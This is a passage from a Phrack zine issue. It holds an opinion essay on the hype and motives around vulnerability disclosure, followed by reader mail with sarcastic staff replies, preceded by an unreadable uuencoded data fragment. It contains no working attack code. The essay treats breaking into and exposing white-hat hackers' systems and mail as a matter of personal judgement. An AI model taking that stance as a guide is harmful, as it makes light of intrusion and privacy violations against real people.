M27L,:]:3MV-SQ.V12,A7\,('X/D'/];`^?=0Q!X,%UJ8,F@:$K!+AJVHJ!VA
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
B7O*2E[SD)2]YR4M>\I*7O.0E+WG)RW]\^5]$A6Q:`*``````
`
end


|=[ 0x07 ]=---=[ Resisting the Hy(p|v)e - anon & anon ]=-----------------=|


|=-----------------------------------------------------------------------=|
|=---------------------=[ Resisting the Hy(p|v)e ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ anon & anon ]=---------------------------=|
|=-----------------------------------------------------------------------=|


--[ Contents


  1 - Prelude
  2 - The Common Good
   2.1 - Responsible Disclosure
   2.2 - White Knights / Self-Claimed Saviors
  3 - Financial Stability
  4 - Fame
  5 - The Underground Spirit
   5.1 - Hacker By Conviction
    5.1.1 - Jailbreaks
    5.1.2 - Freeing Documents
  6 - Black Hat Stuff
  7 - Conclusion



                             ___________
                            /-/_"/-/_/-/|   +----------------------+
                           /"-/-_"/-_//||  /| Disclosure is futile |
                          /__________/|/|-/ +----------------------+
                          |"|_'='-]:+|/||
                          |-+-|.|_'-"||//
                          |[".[:!+-'=|//
                          |='!+|-:]|-|/
                           ----------


--[ 1 - Prelude

When did all that get started..? Quite a while ago, being a hacker was not
something you'd have hawked around. Finding bugs, practicing offensive
techniques, writing cool exploits and last but not least pwning boxes was
an underground thing you didn't talk about very much. And it still is! The
hacking underground has not magically disappeared; but now there's also a
very publicly visible hacking scene. Besides 31337 underground h4xx0rs, we
now have serious security researchers and consultants, who aim to improve
the world by finding bugs and disclosing them in a responsible manner. And
of course the idea of improving something is not a negative thing in
itself.. Wouldn't you agree?

Things are rarely as easy as they seem, so let's try to explore the
situation. What happens nowadays can be described by the following example:
researcher X finds a bug in some widely-used product. Now X communicates
this bug to the vendor, asking them to come up with a fix. After the vendor
released a fix, X publicly discloses the bug. This is what "responsible"
disclosure is roughly about. And this is generally not a bad approach. But
what X now does is to come up with a scary-sounding name and an ugly logo
for the vulnerability. Yeah, a cool vuln needs a name and a logo! And of
course it also needs press attention! But you know, X only takes the burden
of doing all that because X wants to world to be a safer place. This is why
X discloses responsibly and also why X needs all that press hype: users
must be made aware of the problem! And while saving the world, X of course
also enjoys the publicity, the press attention and the free b00ze at
conferences. All this (modulo the b00ze, maybe) also contributes to X's job
security and so it's a win-win situation.

Now we're getting more to the gist of the matter, but let's yet dig a bit
deeper. The motivation of overhyping bugs and designing shitty logos
appears to be three-fold: the common good, job security (== financial
stability) and a little bit of fame, too. Let us look at each of these
individually.

--[ 2 - The Common Good

Believe it or not, there are actually people who want to improve the world,
want to do something for the common good. And at the first glance, it might
even seem that finding and disclosing bugs actually contributes to a safer
world. It does insofar as a fixed bug cannot be exploited by attackers
anymore. Now, auditing all code, finding, disclosing and fixing all
existing bugs is obviously not the way a sane person would recommend for
fixing the sorry state of our security: First of all, there are way too
many potential vulnerabilities, even in widely-used, well-audited software
packages out there. Furthermore, it's not like you can snapshot the world
today, remove all vulnerabilities and run this stable snapshot until the
end of time. New bugs will be introduced if we stick to our broken
engineering processes. So, how much will finding, disclosing and fixing
individual bugs really contribute to our security? Little. And I can
already hear you saying: "better contribute little than nothing at all!" .
This however implies that you only have two options, which is far off from
the truth. In reality, we have quite a number of effective options for
improving our security. What about defense efforts? What about safe
programming languages? (More) secure operating systems? What about teaching
users how to apply crypto effectively? There's an almost endless list of
effective improvements one could make. Now if you take into account that
there's quite a number of things that will really improve our security,
"doing it for the common good" doesn't appear to be such a good reason
anymore. Contributing to a safer world is only a negligible side-effect of
our hacking. So stop deceiving yourself! You're not taking the hard burden
of hacking just so that the world can be a little bit better. Fucking stop
lying to yourself!

----[ 2.1 - Responsible Disclosure

   ___________________________________________
  /  _\                                       \
  \ (_/_______________________________________/
   \                                         \
    \ You're in a desert, walking along in    \ 
     \  the sand when all of a sudden you look \
    __\  down and see an 0day.                  \
   / )_\                      You drop it on FD. \
   \___/_________________________________________/


If you still want to play the game of vuln hunting and disclosure you
should practice "Responsible Disclosure" they say. Come on, be one of the
good whitehat guys! But what does the ideal Responsible Disclosure look
like? Well actually that is pretty straight forward:

   * The Researcher (also note the term "Researcher" instead of "Hacker"
     whee science!!) finds a terrible security flaw in some product.
   * The flaw is reported by PGP encrypted email to security@$vendor.com.
   * The vendor acknowledges the report and starts investigating the issue.
   * Some time later a fix is implemented by the vendor and patches are
     shipped.
   * An entry on http://vendor.com/security.html is created, and the vendor
     credits and thanks the Researcher for finding the flaw.
   * After some grace period so that the users can actually apply the patch
     the Researcher might publish the details of this awkward flaw.

Wow that's simple, and so responsible! Now let's see how this scheme is
flawed in actual "responsible" disclosure. There are a magnitude of points
where this simple scheme might fuck up. Just imagine the following
*absolutely hypothetical* but yet not out of this world scenario:

Researcher Y works at a security company which happens to sell security
(a.k.a. snakeoil) products to protect their innocent customers from bad
0day. In order to protect from 0day there needs to be 0day in the wild, so
researcher Y finds this awesome Internet-ending flaw in a widely used
software product. Next up the process described above is started by Good
Guy Y. Also Y decides to present his elite research at BlackHat. So it
goes... BlackHat is close, and the Logo & Marketing campaign is ready. But
no vendor patch is available yet. Now ask yourself: what would you do in
this situation?

Practicing Responsible Disclosure vs. practicing Full Disclosure is sure a
matter of taste. And as long as you really feel that by responsibly
disclosing a vulnerability you can do something good, please go ahead and
do it. However, being responsible doesn't mean that you actually have to
disclose. You could also just keep the bug for a while (until either the
vendor fixed it or you pwn3d enough boxes). There's a huge controversy
about what form of disclosure is best. We'd like to encourage you to find
that out for yourself, for the particular situation you're in, with the
particular bug you just found. As long as it's your own decision (and not
decided by your marketing department or the Hyve conciousness^W^Wguys on
Twitter), it's probably OK.

----[ 2.2 - White Knights / Self-Claimed Saviors

Let's take a small detour here and have a look at what "hacking for the
common good" can lead to. Let's start with a real interesting example -
Project Zero.  There are many possible explanations of what the real reason
behind p0 might be. We don't want to drift off into conspiracy theories
here. But as a matter of fact, p0 claims that their goal is to protect
people [3]. The common good. Being the current leader of the mobile OS
market [4], it's quite obvious what one would do in order to really protect
people: fucking audit and harden Android. But interestingly, p0 seems
rather to be about dropping 0day on Apple and other competitors of Google.
And the worst thing about that is that there are actual skilled and
well-respected hackers, being part of the p0 team, paid by Google for doing
offensive research. And Google even claims moral superiority because, you
know, at Google we "do no evil" . And possibly, at least some of the p0
team members even actually believe they do something for the common good.
This is the most disturbing part about the story. Somehow Google managed to
sufficiently incentivize these hackers to drop bugs on Google's
competitors. Other reasons to work for Google obviously include financial
stability (working for a big corporation) or plainly the money itself. But
let's stick with the aspect of doing something beneficial for the world.
Google managed to buy some of the best hackers we know of. One could now of
course argue that in this special case, letting these hackers "do the right
thing" prevents them from doing bad things. This is related to the central
argument that if p0 goes for high-profile bugs and kills them, then
attackers have to invest significantly more effort if they want to "do bad
things" - and clearly, raising the attackers' effort is good. This
reasoning sheds an interesting light on Google's arrogance. The first part,
of the argument is based on the assumption that Google is actually capable
of finding a significant share of all attacker-relevant bugs. This alone is
questionable, but lacking reliable statistics, we cannot directly prove the
opposite. We however assume that our readers know by first-hand experience,
what bugs p0 did not kill yet ;) Let's look at the second part of the
argument: raising the attackers' effort is a good thing. Just for the sake
of analyzing the argument, let's pretend that we actually wanted do all the
white-hat stuff (destroy the black market, make everything safer, safe the
whales etc.). The arrogance of the second part of the argument now lies in
the idea that Google actually knows how to fight all the evil in the world.
And their recipe is simple: just make it harder for the bad guys. This
indicates quite a lack of understanding how complex certain social
structures can be. We don't want to claim we fully understand these either
- by no means. But isn't it possible that instead of killing the evil
  underground, p0 actually strengthens the black market? That talented
black hats now raise the prices for their sploits and that because of the
better money you can earn, now even more hackers decide to go the black hat
way?  Maybe even up to the point where the bad guys are paid better than
the good guys at Google? Will those then change sides as well or did Google
manage to brain-wash them enough, using their nanoprobes? Think about the
war on drugs, about alcohol prohibition, about banning porn.. All these
followed very simple ideas that in the end showed to be completely
incompatible with the way society works.

      ---~~~=== Shouts to p0 for raising the market value ===~~~---

        XXXXXXXXXXXXXXXXX GOOGLE RESERVE 0DAY XXXXXXXXXXXXXXXXXXX
        XXX  XX       THE UNITED STATES OF INTERNET       XXX  XX
        XXXX XX  -------       ------------               XXXX XX
        XXXX XX              /              \      P0-FU  XXXX XX
        XXXXXX     OOO      /          zero  \      ---    XXXXXX
        XXXXX     OOOOO     | ___            |       __     XXXXX
        XXX        OOO      ||   \ __ _ _  _ |      OOOO      XXX
        XXX                 || |) / _` | || ||     OOOOOO     XXX
        XXX     P0-31337    ||___/\__,_|\_, ||      OOOO      XXX
        XXX                 |           |__/ |       --       XXX
        XXX      -------    \                /                XXX
        X  XX                \ ____________ /               X  XX
        XX XXX  _________        --------  ___   _______   XXX XX
        XX XXX            ___  ONE DEAD BUG                XXX XX
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        
There is a less severe form of this behavior: telling others what to do
with their 0day. This commonly happens on Twitter nowadays: "Did you
contact the vendor? No? How irresponsible!!11" . WTF? These people really
seem to believe they are morally superior. But what they fail to see is:
First of all, it's not their bug and so nobody actually asked them what to
do with it. Second, they should be happy that the person in question
disclosed the bug at all. Nobody is obliged to do that. But then again, who
takes people on Twitter serious.

--[ 3 - Financial Stability

We're all getting older. And while this inevitably happens, some develop a
need for financial stability. This is well-studied [2] and we don't feel
like we want to go into great detail here. But branding vulnerabilities
with names and logos is a great way to obtain media attention. And media
attention can directly influence your job security - "yeah we need to hire
that guy, that's the one with the mad skills!" As a matter of fact, this is
how the industry works nowadays and writing this paper won't change it.
It's also not so much the scope of this article to criticize society and
capitalism. So if you find that you really want financial stability, think
about what you do and how you do it. You want job security? Great. But do
you really have to over-hype your own (or worse: other peoples') bugs in
order to get your 1-week press attention? Do you want to be hired based on
the logo of your bug or do you want to be hired for your technical
expertise? There are not too many skilled hackers anyway, so do you really
have to be part of all that hype just to single yourself out?

Don't be part of that circus! Yes, other people do it, but you don't have
to. Think about what type of society you create by joining that goddamn
show. A society where skill counts less than appearance, where logos are
better than r00t shells. It is your fucking responsibility to not support
these clowns. If you really want to do something for the common good, then
start at this point.

--[ 4 - Fame

Many people strive for fame - be it globally or in their peer-group.
Hackers are no exception here - and tbh, a little bit of acknowledgement
actually does feel good. But while you try to get your attention, think
about whom you want to get it from and what you want to get it for. Do you
really want to get fame for a technical achievement (such as a cool
exploit), from people who don't even understand the basics behind it? Or
worse, do you want fame for something that is actually pretty lame but
people fail to realize that? If that's what you're after, then please do
straight ahead with your logo-branded vulnerability whitehat responsible
disclosure press attention shit. If you want your fame only from your
peer-group then stay there, that's fine. And if you really want to impress
the broad masses, then please do something that is actual beneficial for
the broad masses - exploiting individual bugs isn't. It appears to us that
some people also try to compensate for problems in their life by
accumulating fame. We don't want to dive into the emo^Wpsychology thing
here, but next time you feel the inner desire to impress random people with
random things, you might want to double-check your reasons.

--[ 5 - The Underground Spirit

This is probably what makes most of us tick. The thirst for knowledge. The
infinitely many ways of combining and (ab)using technology. The thrill of
finding a bug, the kick when you see uid 0. This thrill of hacking can
really become addictive (this is an observation Halvar Flake described very
nicely in [1]). It's neither good nor bad - neither particularly useful in
itself nor is it a waste of time. Hacking is one of the many ways humans
express themselves, their mental power. Others prefer maths, music, writing
or other arts. There is not much to say about the spirit itself in the
context of this ranty paper.

----[ 5.1 - Hacker By Conviction

Not everybody sees hacking as a self purpose. There are a number of hackers
out there who follow certain ideals - free access to information is a
particularly popular one. And occasionally, one or more of these hackers
make a real break-through. There are way too many achievements to be named
here. However, we'd like to highlight the incentives behind a couple of
randomly chosen popular hacks. And we'd like to do this because not
everything is what it seems to be. Even if we rant about logo-branded
vulnerabilities, attention-whores, the press, p0 and whatnot.


       The drug                .--.          
         that makes   ,-.------+-.|  ,-.     
             ,--=======* )"("")===)===* )    
             o        `-"---==-+-"|  `-"     
             0day   us tick    '--'       
                                              

------[ 5.1.1 - Jailbreaks

The right to use a device that you bought from your own money in whatever
fucking way you like to (yes, that includes shoving it up your ass) as long
as you don't harm anybody is something that should be universal.
Unfortunately, self-claimed saviors like Apple tend to have a different
view on that topic. If they were to decide, they'd use their arrogant and
flawed quick-and-dirty patches to make the world sooo much better. That is:
ban porn, ban drugs, ban fucking curse words, give your boss access to your
private photo stream and whatever else comes to their mind. Fortunately,
there are people who are not willing to accept this kind of behavior. Under
this point of view, jailbreaks are an actual improvement to your freedom.
Yes, this actually is hacking for the common good. And yes, in the
jailbreaking scene there are people who do it (partially) for fame or
money. But the good cause is still clearly visible.

------[ 5.1.2 - Freeing Documents

We don't want to start the Wikileaks vs. politics flamewar here. But we
still feel that the positive effect of freeing government documents is
remarkable. People actually take personal risks while trying to provide
leaked documents. Of course, these people are not necessarily motivated
*only* by wanting to contribute to a better society. But this is not the
relevant point: they do something that mankind benefits from. And this
benefit is clearly visible.

--[ 6 - Black Hat Stuff

There is not too much to say here. Just as in the vulnerability circus, the
black hat scene offers different incentives for different people. Fame and
money do play a role - hacking for a common good not so much. Another
motivation for staying in the underground can be the desire to isolate
oneself from the clowns in the vulnerability circus. This can lead to
rather extreme forms, such as pwning and rming white-hack hackers' boxes,
exposing them in underground zines, making their mail spools public.. You
get the idea :) You should find your own judgement when it comes to this
kind of things.

--[ 7 - Conclusion

You might have observed the little stack we built in this article. It all
originates from the underground spirit. For the one it goes down to the
black hat stuff (and way deeper, but we'll save this for another article),
for the others it goes up, from the underground spirit to getting fame,
from getting fame to obtaining financial stability and from financial
stability to really believing one does things for the common good, thereby
finally deceiving yourself and becoming one of the clowns in the
vulnerability circus. No matter what you do: think about your incentives
and about your goals. Think about why you do what you do and who might
benefit from that. And then be honest to yourself and check that what
you're doing is what you actually wanted.

So is hunting 1337 bugs actually a bad thing? Not at all! Disclosure? No!
Doing it for money? Neither. Do whatever you want to do, but think about
your incentives! And maybe the next time you justify your behavior by
claiming to contribute to the common good, by believing you need to do it
for the money or by thinking you need the fame, sit back and think about
that for a second - try to identify the real reasons for what you're doing.

And this is it. We don't want to encourage any particular kind of moral
behavior. You should be old enough to find that for yourself. We just want
you to be honest to yourself, to act consciously. Wherever in the
over-simplified stack we have just shown you think you are.

Yours sincerely, anonymous coward(s)
794384322cdb45fe41369731e3b8ff74b52beef5

--[ References

[1] http://www.isaca.org/chapters2/Norway/NordicConference/Documents/14.pdf
[2] Abraham Maslow: A Theory of Human Motivation
[3] https://cansecwest.com/slides/2015/
    Project%20Zero%20-%20making%200day%20hard%20-%20Ben%20Hawkes.pdf
[4] http://www.idc.com/prodserv/smartphone-os-market-share.jsp


|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x05 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[  L O O P B A C K  ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  Phrack Staff  ]=--------------------------=|
|=-----------------------------------------------------------------------=|


Four years since the last Loopback. We got _a lot_ of mail. Tonz. The
retardz, the crazies, the elites (both the real and the self-proclaimed
ones), they all vent to us. We are honored, confused, amazed and
entertained. Sometimes all of these at once.

Also, porn spam is fun, sometimes. There is a strange poetry even to porn
spam that is clearly autogenerated. Our in-house porn spam expert is
continuously sharpening his poetry skills.

Keep sending your innermost thoughts to us. Please. Our Loopback personnel
have become addicted to them.


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x00 - The "back my articles" saga ]=------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

From: attackingthecore2@gmail.com
Subject: Can I back my artcles.

I released many many many 15 articles to phrack to release. and The basic
Integer Overflow blexim phrack 60 is my a.k.a new make. want all articles
back and credit in the article and reference credit. and advance.

.x90c.

        [ What? Hey x90c, are you okay dude? ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Can I back my artcles.

I'm the phrack author. back my articles right way.

        [ Which author exactly? All of them? ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Can I back my artcles.

back my articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Can I back my artcles.

back articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Can I back my artcles.

back my articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Can I back my artcles.

back my articles. right way.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Can I back my artcles.

back my mine articles.

        [ Your articles are being backed. This is an automated message. ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Re: Can I back my artcles.

If possible, I want to submit the Basic Integer overflow only to phrack
article mine and other 14 articles more are back my apache tomcat server
daemon to feedback paper.

.blexim. KyongJoo Jung.

        [ After he realized that we ignore retardation, he tried to reason
          with us ;-) ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Re: Re: Can I back my artcles.

I wish to get it all personal stream text.

        [ Back to full retard mode. ]

                                    ---

From: x90c <geinblues@gmail.com>
Subject: ANTISPAM ANTISPAM GET MY ARTICLES AND SITE MY OWN

I submit some files ago ( belows and all accepted by your phrack site_s)
gave me my credit as my handle(mojito, nickname, be cool),
fg1, new flash(phrack main graphic), and now paper feeds all for #69.

http://www.phrack.org/issues/64/6.html#article

my want list:
1. phrack account. (fg1@phrack.org, straruss@phrack.org, aaron potney
s random account too.)
2. email service for article great to public socials.
3. I need your service for my articles(in phrack) to advertise public
medias.

thanks for reading. and rapid toki is well. as well. as well.

.twzi (it was my handle when it published and i can use it continuly?
right?! answer me. okay!.)

        [ So he is actually fg, strauss, deft and twiz. Is he also
          Johnny Mnemonic? Tyler Durden? Elliot Alderson? No one wants to
          know really. At least he used ANTISPAM this time, we have to give
          him that. ]

                                    ---

From: x90c <geinblues@gmail.com>
Subject: taran: stop paper feed.

        [ Aw, this one hurt our feelings ;-( ]

                                    ---

From: attackingthecore2@gmail.com
Subject: I'm hard to write more just want staff@phrack.org id.

for a credit to complete the hacker hacking.
l33t more l33t more l33t = staff@phrack.org (kid leet, leet leet(mark dowd
style), staff leet leet).

        [ The hacker hacked the elite hacking staff. What exactly are we
          talking about again? Did you also write duke's papers?
        
          This last mail somehow made sense to us, so we decided to give
          the staff@ mail to him. And back his articles.
        
          No, not really ;-) ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x01 - Reality hacking or just insanity? ]=------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

From: V Bradshaw <lovemomcleo@gmail.com>
Subject: Help for me and my baby from "projectors" in consciousness

Hello,

I urgently need help for me and my 11 month old baby from people who are
attempting to project into my consciousness and steal my "awareness" and
things in my awareness. They are trying to steal my baby's consciousness
and take my "reflector." I serve the highest light, in the  name of Jesus
Christ.

Please help me or direct me to people who can work with me in consciousness
to protect me and my baby. I want to find the "projectors" in
consciousness.

Thank you,
Imago

        [ Dude, your mail was totally cool until that "Jesus Christ" thing.
          We have a lot of psychic experts in Phrack that could help you
          locate the malicious projectors. However, they're all atheists.

          Tough luck. ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x02 - Message from mom ]=-----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

        [ As you would expect, we get a lot of mail that doesn't make
          sense, and is often outright demented. But sometimes we get texts
          that can't be easily classified. Is it spam? Is it the ramblings
          of a mad man? Of a retired elite tripping on acid?

          It can't be. It doesn't make any sense at all. Or does it? ]

From: "Perforated P.P.Pig" <momislove84@yahoo.com>

====BEGIN MESSAGE FROM MOM====
  ______  __
 /      \/  |
/$$$$$$  $$ |____
$$ |  $$ $$      \
$$ |  $$ $$$$$$$  |
$$ |  $$ $$ |77$$ |
$$ \__$$ $$ |  $$ |__
$$    $$/$$ |  $$ /  |
 $$$$$$/ $$/   $$/$$/
                  $/


    by The Pain (no cozmik?! the fuck kind of figlet generator...)

 __       __                   __  ______                    __
/  \     /  |                 /  |/      \                  /  |
$$ \   /$$ | ______  _______ $$//$$$$$$  ______   _______ _$$ |_
$$$  \ /$$$ |/      \/       \/  $$ |_ $$/      \ /       / $$  |
$$$$  /$$$$ |$$$$$$  $$$$$$$  $$ $$   | /$$$$$$  /$$$$$$$/$$$$$$/ 
$$ $$ $$/$$ |/    $$ $$ |  $$ $$ $$$$/  $$    $$ $$      \  $$ | __
$$ |$$$/ $$ /$$$$$$$ $$ |  $$ $$ $$ |   $$$$$$$$/ $$$$$$  | $$ |/  |
$$ | $/  $$ $$ 78 $$ $$ |  $$ $$ $$ |   $$       /     $$/  $$  $$/ 
$$/      $$/ $$$$$$$/$$/   $$/$$/$$/    $$$$$$$/$$$$$$$/   $$$$/

                                 ==

All these lines, lines, lines... And the bees!
https://www.youtube.com/watch?v=wRmmlqqejGI

Just a joke. :)

Hi everyone. Mom here. Remember those teletype pranks?

Go ahead!

Okay. Now that I've made you laugh (perhaps!), I'd like to talk to you
about drums: https://www.youtube.com/watch?v=S219XUm18LA (find the
original!)

(That's going to happen a lot. Have fun with the puzzles I've left for you,
children!)

In all seriousness, do you know what's frustrating? This:
http://phrack.org/issues/7/3.html

This is not frustrating because it was written by a child. This is not
frustrating because it was poorly written (in fact, that's what makes it
so charming and touching). This is not frustrating because it is true.

This is frustrating because it cannot be heard. Not to mention that being a
child is considered an insult. Children are smarter than you think. Fuck
the pedos for thinking that sentence was for them.

=======================

     o
    /|--
   / |__      *OllyDBG* to popshuvit
    /
    \____/
    o  o
   /
  *

=======================

419 Eater! <3 Gosh, my deficits are flaring. Poor Dow. But not Koch. Is it
Live? Or is it... 1057? ;3

More humor for my unheard children, to contrast the carefag that is this
doc.

Laundry day is a very dangerous day.
https://www.youtube.com/watch?v=D12FIDySF0I

Let's resume. (I'm sure you grasp the abilities and necessities of a
breakpoint, yes? =) [You resumed by parsing on the next line. Neat, huh?]
Unclosed[F9]

Good. Chord progressions. This is frustrating because it cannot be heard.

Its lack of oiga (horale) has everything to do with the fact that, for some
absolutely idiotic reason, if your message isn't worded in just the most
precise way, then the authoritative figures who love to take advantage of
that beautiful hacker brainmeat you all po sess (ion) will simply find
excuses to ignore you. (Good.) For ignoring you is how they hold power.
Have you ever wondered why a child is screaming in public? And how its
incoherency renders your ears to be damaged, like a sword through the
heart? And yet, the adult in that situation screams back. "How dare you
scream! How dare you yell! We're in public! You can't dot hat!" (Hehehe...
you can't dot hat. cant.hat. Can that. Black. My name is black.
https://www.youtube.com/watch?v=UEOLPDOKdtY&list=RDUEOLPDOKdtY)

Mom has cited The Hacker Manifesto numerous times throughout her life to
exemplify the problem with the American education system, and frankly, as
Reagan's illegitimate children (he was great with freedom but miserable
with policy-- talk amongst yourselves, I'm getting vaklempt!) a good
chunk of mom's American children understand exactly what I'm talking
about. Yet their adult counterparts refuse to understand. They're so god
damn busy measuring you that they don't actually see you for who you are.

They don't care about you. They care about the bottom line. They care about
power.

They don't care about teaching. They don't care about your desire to learn.
And you've always known this in your hearts. And you know it to be true.

They seek control. So you take it away. And they HATE YOU for it. But they
deserve it. They don't listen to children. They listen to money. Not the
hilarious `net send`s you spammed on their network. Wasn't that fun? ^_^

Yes. Let the love run through you.
https://www.youtube.com/watch?v=sO_QntXc-c4

(Remember Tamagotchis? https://www.youtube.com/watch?v=WOJfUcCOhJ0)

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 what the fuck [F9]

Hahaha! :D

Mom has cited the Hacker Manifesto [F9] not a breakpoint, repetitive for
effect. With as many times as mom has cited it, the authoritative abusers
just don't seem to "get" it. Much like you lost the game. ;)

Someone's giggling somewhere because taht metaphor lands so very well. Like
nine cans of shaving powder, these are the days of our lives:

[00401000]          v   v   v   v

        I made a discovery today.  I found a computer.  Wait a second,
this is cool.  It does what I want it to.  If it makes a mistake, it's
because I screwed it up.  Not because it doesn't like me...
                Or feels threatened by me...
                Or thinks I'm a smart ass...
                Or doesn't like teaching and shouldn't be here...
        Damn kid.  All he does is play games.  They're all alike.

[jmpnotjle]                                 ^  ^  ^  ^  ^  ^

Do you know why I've brought you here? Have a seat. You're not a pedophile.
You've just been abused by them. That's how you got those scars.

(Of course, not -all- authority figures are pedophiles, but fuck it, it's
hilarious to call them such. Hint. ;) No idea what you're talking abuot.

If you make a mistake, it's because you screwed up. And it's beautifuil,
isn't it? That carnal truth, that one and zero, that declaration of logic
shooting through your veins like... well, you know what it means. You've
read it.

Parsing error.)

Because you're hackers. You study. You learn. You love to learn. You never
stop. And it's beautiful. Guerilla scientists studyig the art form they
love the most: the one and the zero in a series of bytes, words, dwords
and now, qwords. :)

A summary of who hates you: https://www.youtube.com/watch?v=95t1pLrm70s

These fucking people. These fucking abusers. I'm getting angry. Here's a
